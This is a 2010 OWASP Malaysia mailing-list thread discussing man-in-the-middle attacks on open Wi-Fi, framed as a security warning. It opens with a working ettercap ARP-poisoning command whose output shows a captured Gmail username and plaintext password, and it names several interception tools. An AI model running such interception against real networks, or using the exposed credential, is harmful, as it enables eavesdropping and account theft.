ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah target dan 254 adalah gateway
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau dragon Listening on eth0... (Ethernet) eth0 -> 00:0C:29:97:59:E4 10.1.1.1 255.255.255.0 Privileges dropped to UID 0 GID 0... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Scanning for merged targets (2 hosts)... * |==================================================>| 100.00 % 2 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92 GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6 Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help HTTP : 74.125.127.99:443 -> USER: 9w2pju PASS: selamathariraya INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3 On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <[email protected]> wrote: > Haris, > > Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar... > > > On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <[email protected]>wrote: > >> Based on the blog post, plenty of tools can be used to perform such >> attacks. Nowadays tools are getting more "user friendly" and yeah since >> he's using insecure Wifi facility -visible network packets/traffics - >> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with >> ferret and hamster is much more easier. But based on the symptoms or the >> screenshots, it is more monkey in the middle attack compared to >> sidejacking (I prefer this one). >> >> So, never access your private accounts using insecure or open ap >> wireless environment. Guna la broadband.. :D >> >> p/s: besides I believe nobody actually read/understand/concern on the >> warning popups regarding the cert validity. Usually we just click "Add >> exception" and "proceed" :D >> >> That's my 2 halala >> >> Thanks >> >> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote: >> > There is https/ssl mitm in the cain & abel using fake private/public >> key. It intercepts the ssl handshake and providing the fake key (if the key >> is not trusted) to the client. In my previous test, my friend realized a >> fake ssl for maybank site when I'm running the attack, and he told me >> maybank has been hacked (but not). For wireless (not ethernet) layer 2, >> there is utility like airpwn and karma for this kind of attack. I haven't >> read yet the blog but to answer first the question. Wallahualam. >> > Sent from my BlackBerry® smartphone >> > >> > -----Original Message----- >> > From: Harisfazillah Jamel <[email protected]> >> > Sender: [email protected] >> > Date: Fri, 24 Sep 2010 19:21:31 >> > To: owasp-malaysia<[email protected]> >> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless >> > >> > Tittle should be man in the minddle attack.. >> > >> > ettercap can be used to capture packet. But its hard to get our >> > password in HTTPS protocol. I believe a kind of proxy is used for >> > this. >> > >> > Any idea what kind of proxy? >> > >> > >> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote: >> >> ARP poisoning can be used.ettercap >> >> >> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" <[email protected]> >> wrote: >> >>> Assalamualaikum and salam sejahtera, >> >>> >> >>> Would like to share this blog post. >> >>> >> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/ >> >>> >> >>> How man in the middle attack can be used in this case? >> >>> >> >>> Thanks. >> > _______________________________________________ >> > Owasp-Malaysia mailing list >> > [email protected] >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> > >> > OWASP Malaysia Wiki >> > http://www.owasp.org/index.php/Malaysia >> > >> > OWASP Malaysia Wiki Facebook >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > _______________________________________________ >> > Owasp-Malaysia mailing list >> > [email protected] >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> > >> > OWASP Malaysia Wiki >> > http://www.owasp.org/index.php/Malaysia >> > >> > OWASP Malaysia Wiki Facebook >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > >> >> _______________________________________________ >> Owasp-Malaysia mailing list >> [email protected] >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> OWASP Malaysia Wiki >> http://www.owasp.org/index.php/Malaysia >> >> OWASP Malaysia Wiki Facebook >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > -- 73 de 9W2PJU http://9w2pju.blogspot.com
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
